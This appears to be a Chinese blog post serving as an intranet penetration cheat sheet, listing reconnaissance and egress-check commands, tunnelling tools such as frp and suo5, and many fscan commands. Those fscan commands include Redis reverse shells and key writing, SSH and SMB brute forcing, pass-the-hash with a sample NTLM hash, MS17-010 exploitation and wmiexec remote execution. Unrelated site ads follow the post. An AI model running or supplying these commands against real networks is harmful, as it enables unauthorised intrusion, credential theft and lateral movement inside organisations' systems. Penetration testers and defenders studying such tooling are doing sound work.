内网渗透工具
获取网络配置
ipconfig /all
ifconfig
同时通过这个也可以知道是windows还是linux
获取系统信息
systeminfo | findstr /B /C"OS名称 " OS 版本"
systeminfo | findstr /B /C"OSName " OS Version"
其实直接使用systeminfo感觉更靠谱,有些版本格式不一样,查不出来。不如直接使用systeminfo。
使用工具
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
识别杀软网站
https://i.hacking8.com/tiquan/
查看是否出网
ICMP协议
ping www.baidu.com
tracert baidu.com
TCP/UDP
telnet 192.168.1.108 22 //TCP
nc -zv 39.101.135.232 9999 //TCP
nc -zuv 192.168.1.108 80 //UDP
HTTP/HTTPS
curl http://www.baidu.com //HTTP
curl https://www.baidu.com //HTTPS
Linux:wget、curl
Windows:certutil、powershell、bitsadmin、regsrv......
DNS
dig @8.8.8.8 www.baidu.com //DNS
nslookup www.baidu.com 8.8.8.8 //DNS
获取权限信息
whoami
隧道搭建
当frp搭建不了的时候,使用webshell来进行一个搭流量转发
https://github.com/zema1/suo5
https://github.com/fatedier/frp/releases/tag/v0.58.1
https://github.com/ehang-io/nps/blob/master/README_zh.md
内网扫描
查询arp缓存表
arp -n
arp -a
使用扫描工具
https://github.com/shmilylty/netspy
nohup netspy is &
nohup netspy is -c 10.0.0.1/8 &
https://github.com/shadow1ng/fscan
fscan.exe -h 192.168.1.1/24 -nobr -nopoc
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
-socks5
域信息获取
参考[[Cobalt Strike使用]]
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通